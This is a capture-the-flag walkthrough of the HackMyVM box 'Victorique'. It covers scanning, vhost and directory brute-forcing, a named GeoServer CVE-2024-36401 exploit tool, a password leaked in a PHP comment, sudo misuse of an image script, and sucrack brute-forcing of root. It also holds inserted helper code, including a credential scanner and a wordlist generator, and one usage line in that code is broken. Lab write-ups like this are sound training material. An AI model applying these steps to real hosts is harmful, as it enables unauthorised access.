HackMyVM-Victorique

Can I never go back?
Is this the beginning, or the end?


Information gathering

./rustscan -a 192.168.56.106
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.56.106:22
Open 192.168.56.106:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-08 19:14 EST
Initiating ARP Ping Scan at 19:14
Scanning 192.168.56.106 [1 port]
Completed ARP Ping Scan at 19:14, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:14
Completed Parallel DNS resolution of 1 host. at 19:14, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:14
Scanning 192.168.56.106 [2 ports]
Discovered open port 22/tcp on 192.168.56.106
Discovered open port 80/tcp on 192.168.56.106
Completed SYN Stealth Scan at 19:14, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.56.106
Host is up, received arp-response (0.0010s latency).
Scanned at 2026-01-08 19:14:52 EST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:7C:51:17 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Visiting port 80 shows a page asking us to add the domain name victorique.xyz.

After adding it, we get a front-end page.

Routine directory brute-forcing and subdomain brute-forcing:

┌──(root㉿kali)-[/home/kali/Desktop]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://victorique.xyz/ --append-domain -t 25 | grep -v "301"
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://victorique.xyz/
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent: gobuster/3.8
[+] Timeout: 10s
[+] Append Domain: true
[+] Exclude Hostname Length: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
gifts.victorique.xyz Status: 200 [Size: 8367]
#www.victorique.xyz Status: 400 [Size: 299]
#mail.victorique.xyz Status: 400 [Size: 299]
#smtp.victorique.xyz Status: 400 [Size: 299]
#pop3.victorique.xyz Status: 400 [Size: 299]
===============================================================
Finished
===============================================================

Found another domain; viewing it gives a username and password.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# feroxbuster -u http://victorique.xyz/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,zip,txt,html,htm --scan-dir-listings -C 503

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://victorique.xyz/
🚩 In-Scope Url │ victorique.xyz
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
💢 Status Code Filters │ [503]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
📂 Scan Dir Listings │ true
💲 Extensions │ [php, zip, txt, html, htm]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 196l 628w 8326c http://victorique.xyz/index
200 GET 102l 396w 4980c http://victorique.xyz/library
200 GET 151l 472w 7209c http://victorique.xyz/profile
301 GET 9l 28w 316c http://victorique.xyz/image => http://victorique.xyz/image/
200 GET 1914l 11013w 828758c http://victorique.xyz/image/vtr.png
200 GET 306l 820w 10959c http://victorique.xyz/login
200 GET 196l 628w 8326c http://victorique.xyz/
[####################] - 23m 1323330/1323330 0s found:7 errors:0
[####################] - 23m 1323270/1323270 967/s http://victorique.xyz/
[####################] - 23m 1323270/1323270 960/s http://victorique.xyz/image/

Meanwhile the directory brute-force finished as well. Logging in with the given credentials failed, with a message telling us we had been tricked.

┌──(root㉿kali)-[/home/kali/Desktop]
└─# feroxbuster -u http://gifts.victorique.xyz/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,zip,txt,html,htm --scan-dir-listings -C 503

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.13.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://gifts.victorique.xyz/
🚩 In-Scope Url │ gifts.victorique.xyz
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
💢 Status Code Filters │ [503]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.13.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
📂 Scan Dir Listings │ true
💲 Extensions │ [php, zip, txt, html, htm]
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 285c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 282c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 199l 650w 8367c http://gifts.victorique.xyz/
200 GET 199l 650w 8367c http://gifts.victorique.xyz/index.html
200 GET 57l 935w 9785c http://gifts.victorique.xyz/greatgifts.txt

But the directory brute-force on the subdomain did turn something up.

(At this point I thought this was the real password, but I still could not log in; only later did I realise it was a subdomain.)

After adding the subdomain, it turns out to be GeoServer.

Getvictorique


Found an exploitation tool for CVE-2024-36401:

netuseradministrator/Geoserver_gui_exp: an all-in-one GeoServer exploitation tool

Successfully got a shell back.

Root

victorique@Victorique:~$ ls -al
total 140
drwxr-xr-x 4 victorique victorique 4096 Dec 12 21:35 .
drwxr-xr-x 3 root root 4096 Dec 12 04:55 ..
lrwxrwxrwx 1 root root 9 Dec 12 02:36 .bash_history -> /dev/null
-rw-r--r-- 1 victorique victorique 220 Apr 18 2019 .bash_logout
-rw-r--r-- 1 victorique victorique 3526 Apr 18 2019 .bashrc
drwxr-xr-x 12 victorique victorique 4096 Dec 12 00:21 Geo
-rw-r--r-- 1 root root 149 Dec 12 21:35 hint.txt
-rwx------ 1 root root 105918 Dec 12 04:08 .kagura.png
drwxr-xr-x 2 victorique victorique 4096 Dec 12 21:36 .oracle_jre_usage
-rw-r--r-- 1 victorique victorique 807 Apr 18 2019 .profile
-rw-r--r-- 1 root root 33 Dec 12 02:40 user.txt

victorique@Victorique:~$ cat hint.txt 
Found some useful fragments. Converted them into a visual representation.

--Cordelia Gallo

There are some suspicious files in the home directory, including a png image that only root may read.

Gathering information on the box, the password of user victorique turned up in the web root.

victorique@Victorique:/var/www/html$ ls
image index.html IoIooIIOIOio library.html login.php profile.html
victorique@Victorique:/var/www/html$ cat login.php
<?php
// For a POST request, run the login check
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Read the JSON request body
    $json = file_get_contents('php://input');
    $data = json_decode($json, true);

    $username = $data['username'] ?? '';
    $password = $data['password'] ?? '';

    // Respond as JSON
    header('Content-Type: application/json');

    // Check logic (runs server-side, invisible to the front end)
    // User victorique's password: shinigami_qujo
    if ($username === 'ookami' && $password === 'GoS1Ck') {
        echo json_encode([
            'status' => 'success',
            'msgEn' => '"The cunning gray wolf has deceived you. The gift lies deeper."',
            'msgJp' => '「狡猾な灰色の狼はあなたを欺いた。贈り物はもっと深くにある。」'
        ]);
    } else {
        echo json_encode([
            'status' => 'fail',
            'msgEn' => 'Access Denied: The chaotic fragments reject you.',
            'msgJp' => 'アクセス拒否:混沌の欠片があなたを拒絶しています。'
        ]);
    }
    // Stop here so that no HTML is output
    exit;
}
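The weakness that gave up the user password above is a credential sitting in a server-side comment, next to a hard-coded comparison. A small source scanner for exactly those two patterns, written as an added example (not code from the box or the blog), with a constructed PHP sample modelled on login.php:

```python
import re

# Constructed sample modelled on the login.php shown above; not the box's file verbatim.
SAMPLE_PHP = """<?php
// User victorique's password: shinigami_qujo
if ($username === 'ookami' && $password === 'GoS1Ck') {
    echo json_encode(['status' => 'success']);
}
"""

COMMENT = re.compile(r'(?://|#)\s*(?P<text>.*)')  # single-line PHP comments
# "password: value", "pwd=value", "secret : value" ... inside comment text
CRED_IN_TEXT = re.compile(r'(?i)\b(?:pass(?:word|wd)?|pwd|secret|token)\b\s*[:=]\s*(?P<value>\S+)')
# $password === 'literal' / $pwd == "literal": a credential compared against a string literal
HARDCODED_CMP = re.compile(r'\$(?:pass\w*|pwd|secret|token)\s*={2,3}\s*([\'"])(?P<value>[^\'"]+)\1')


def find_hardcoded_credentials(source: str):
    """Return (line, kind, value) for credential-looking comments and literal comparisons."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = COMMENT.search(line)
        if m:
            hit = CRED_IN_TEXT.search(m.group('text'))
            if hit:
                findings.append((lineno, 'comment', hit.group('value')))
        for hit in HARDCODED_CMP.finditer(line):
            findings.append((lineno, 'comparison', hit.group('value')))
    return findings


if __name__ == '__main__':
    for lineno, kind, value in find_hardcoded_credentials(SAMPLE_PHP):
        print(f'line {lineno}: {kind} credential {value!r}')
```

Run it over a web root (for example with `find . -name '*.php'`) to catch the same mistake before an attacker reads the file.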

victorique@Victorique:/var/www/html$ sudo -l
[sudo] password for victorique:
Matching Defaults entries for victorique on Victorique:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User victorique may run the following commands on Victorique:
(ALL) /usr/bin/python3 /opt/img2txt.py *

We found that this script can be run through sudo.

victorique@Victorique:~$ cat /opt/img2txt.py 
"""
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import argparse

import cv2
import numpy as np


def get_args():
parser = argparse.ArgumentParser("Image to ASCII")
parser.add_argument("--input", type=str, default="data/input.jpg", help="Path to input image")
parser.add_argument("--output", type=str, default="data/output.txt", help="Path to output text file")
parser.add_argument("--mode", type=str, default="complex", choices=["simple", "complex"],
help="10 or 70 different characters")
parser.add_argument("--num_cols", type=int, default=150, help="number of character for output's width")
args = parser.parse_args()
return args


def main(opt):
if opt.mode == "simple":
CHAR_LIST = '@%#*+=-:. '
else:
CHAR_LIST = "$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\|()1{}[]?-_+~<>i!lI;:,\"^`'. "
num_chars = len(CHAR_LIST)
num_cols = opt.num_cols
image = cv2.imread(opt.input)
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
height, width = image.shape
cell_width = width / opt.num_cols
cell_height = 2 * cell_width
num_rows = int(height / cell_height)
if num_cols > width or num_rows > height:
print("Too many columns or rows. Use default setting")
cell_width = 6
cell_height = 12
num_cols = int(width / cell_width)
num_rows = int(height / cell_height)

output_file = open(opt.output, 'w')
for i in range(num_rows):
for j in range(num_cols):
output_file.write(
CHAR_LIST[min(int(np.mean(image[int(i * cell_height):min(int((i + 1) * cell_height), height),
int(j * cell_width):min(int((j + 1) * cell_width),
width)]) * num_chars / 255), num_chars - 1)])
output_file.write("\n")
output_file.close()


if __name__ == '__main__':
opt = get_args()
main(opt)

This script converts an image into ASCII art. Together with hint.txt, which tells us to look for fragments, there should be several more images.
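The cell-averaging mapping that the script performs, reimplemented in pure Python as an added example (not the box's script or the upstream project's code) so it runs without OpenCV: it includes a minimal binary PPM (P6) reader, since one of the fragments on this box is a .ppm, and reproduces the script's fallback to 6x12 cells. The black-and-white test image is constructed inline.

```python
import re

SIMPLE_CHARS = '@%#*+=-:. '  # same 10- and 70-character ramps as /opt/img2txt.py
COMPLEX_CHARS = "$@B%8&WM#*oahkbdpqwmZO0QLCJUYXzcvunxrjft/\\|()1{}[]?-_+~<>i!lI;:,\"^`'. "
_TOKEN = re.compile(rb'(?:\s+|#[^\n]*\n)*(\S+)')  # next header token, skipping whitespace and comments


def parse_ppm_p6(data: bytes):
    """Parse an 8-bit binary PPM (P6) header; returns (width, height, raw RGB bytes)."""
    tokens, pos = [], 0
    while len(tokens) < 4:  # magic, width, height, maxval
        m = _TOKEN.match(data, pos)
        tokens.append(m.group(1))
        pos = m.end()
    if tokens[0] != b'P6' or int(tokens[3]) != 255:
        raise ValueError('expected an 8-bit binary PPM')
    width, height = int(tokens[1]), int(tokens[2])
    return width, height, data[pos + 1:pos + 1 + width * height * 3]  # one whitespace byte after maxval


def to_gray(rgb: bytes, width: int, height: int):
    """Luma conversion with the weights cv2 uses for RGB->GRAY; returns rows of ints 0..255."""
    px = [(rgb[k], rgb[k + 1], rgb[k + 2]) for k in range(0, 3 * width * height, 3)]
    return [[round(0.299 * r + 0.587 * g + 0.114 * b) for r, g, b in px[y * width:(y + 1) * width]]
            for y in range(height)]


def image_to_ascii(gray, num_cols: int, mode: str = 'simple'):
    """Cell-average mapping exactly as in img2txt.py, including its fallback to 6x12 cells."""
    chars = SIMPLE_CHARS if mode == 'simple' else COMPLEX_CHARS
    n, height, width = len(chars), len(gray), len(gray[0])
    cell_w, cell_h = width / num_cols, 2 * width / num_cols
    num_rows = int(height / cell_h)
    if num_cols > width or num_rows > height:  # the script's "Too many columns or rows" branch
        cell_w, cell_h = 6, 12
        num_cols, num_rows = int(width / cell_w), int(height / cell_h)
    lines = []
    for i in range(num_rows):
        y0, y1 = int(i * cell_h), min(int((i + 1) * cell_h), height)
        row = []
        for j in range(num_cols):
            x0, x1 = int(j * cell_w), min(int((j + 1) * cell_w), width)
            cell = [gray[y][x] for y in range(y0, y1) for x in range(x0, x1)]
            mean = sum(cell) / len(cell) if cell else 255  # empty cell -> blank instead of the script's nan
            row.append(chars[min(int(mean * n / 255), n - 1)])
        lines.append(''.join(row))
    return lines


def sample_ppm(width: int = 12, height: int = 24) -> bytes:
    """Constructed test image (not a file from the box): left half black, right half white."""
    pix = bytes(c for y in range(height) for x in range(width)
                for c in ((0, 0, 0) if x < width // 2 else (255, 255, 255)))
    return b'P6\n# constructed\n%d %d\n255\n' % (width, height) + pix
```

`print('\n'.join(image_to_ascii(to_gray(*reversed_args), 2)))` style usage is left to the test; on the sample image every row comes out as `@ ` (black cell, white cell).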

victorique@Victorique:~$ find / -type f -name ".*.png" 2>/dev/null
/home/victorique/.kagura.png
/opt/.kujo.png
/etc/ssh/.shinigami.png
/var/www/html/.victorique.png

victorique@Victorique:~$ ls -al /opt/.kujo.png
-rwx------ 1 root root 70668 Dec 12 04:54 /opt/.kujo.png
victorique@Victorique:~$ ls -al //etc/ssh/.shinigami.png
-rwx------ 1 root root 5161 Dec 12 20:35 //etc/ssh/.shinigami.png
victorique@Victorique:~$ ls -al/var/www/html/.victorique.png
ls: invalid option -- '/'
Try 'ls --help' for more information.
victorique@Victorique:~$ ls -al /var/www/html/.victorique.png
-rwx------ 1 root root 113801 Dec 12 04:08 /var/www/html/.victorique.png
victorique@Victorique:~$

But I found that these images are of no use here, and the image formats are not limited to png (there are three kinds in total: png, webp and ppm), so I kept looking.

sudo /usr/bin/python3 /opt/img2txt.py --input /usr/games/.haru.ppm --output 1.txt --mode simple

Fragment 1, source: /etc/ssh/.shinigami.png

Fragment 2, source: /var/www/html/IoIooIIOIOio/sunset.webp

Fragment 3, source: /usr/games/.haru.ppm

Then permute these ASCII-art fragments in every order to get the following wordlist:

C11pp3r510n5h1pch4mp
C11pp3r5ch4mp10n5h1p
10n5h1pC11pp3r5ch4mp
10n5h1pch4mpC11pp3r5
ch4mpC11pp3r510n5h1p
ch4mp10n5h1pC11pp3r5
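The permutation step above, as an added example (not the blog's own script): every ordering of the k fragments joined together, deduplicated, which for k = 3 gives exactly the six candidates listed, and the one-per-line file format that sucrack consumes.

```python
from itertools import permutations

# The three fragments recovered from the ASCII-art images above.
FRAGMENTS = ['C11pp3r5', 'ch4mp', '10n5h1p']


def fragment_wordlist(fragments):
    """Join the fragments in every order; at most k! candidates, fewer if fragments repeat."""
    seen, out = set(), []
    for order in permutations(fragments):
        candidate = ''.join(order)
        if candidate not in seen:  # permutations() repeats orders when fragments are equal
            seen.add(candidate)
            out.append(candidate)
    return out


def write_wordlist(path, fragments=FRAGMENTS):
    """Write one candidate per line (the layout sucrack expects); returns the number written."""
    words = fragment_wordlist(fragments)
    with open(path, 'w') as fh:
        fh.write('\n'.join(words) + '\n')
    return len(words)


if __name__ == '__main__':
    print('\n'.join(fragment_wordlist(FRAGMENTS)))
```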

Brute-forcing with this list gives the root password.

victorique@Victorique:~$ ./sucrack -u root -w 20 2.txt 
password is: C11pp3r5ch4mp10n5h1p
root@Victorique:~# ls
root.png

The flag here is also a png. It could have been converted with the script above as well, but I could not be bothered and simply transferred it to the attacking machine and opened it.


http://example.com/2026/01/09/HackMyVM-Victorique/
Author: Skyarrow
Posted on January 9, 2026